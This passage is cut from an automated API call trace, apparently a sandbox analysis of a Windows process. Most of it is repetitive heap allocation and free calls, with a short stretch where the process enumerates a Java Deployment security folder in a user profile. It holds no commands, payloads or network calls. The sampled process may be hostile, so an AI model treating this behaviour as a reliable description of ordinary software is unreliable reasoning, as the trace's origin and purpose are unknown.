hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.434] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.434] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.437] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.440] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\") returned="security\\" [0061.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ae070 [0061.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.440] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0061.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0061.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ae070 | out: hHeap=0x660000) returned 1 [0061.440] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0061.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0061.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0061.440] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0061.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0061.440] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0061.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.440] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86fe0 [0061.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.440] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0061.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86fe0 | out: hHeap=0x660000) returned 1 [0061.440] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.440] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.440] PathFindFileNameW (pszPath="") returned="" [0061.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.440] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.441] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.441] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.441] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0061.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262b28 | out: hHeap=0x660000) returned 1 [0061.441] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ae070 [0061.442] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adea8 [0061.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.442] HeapFree (in: hHeap=0x660000, 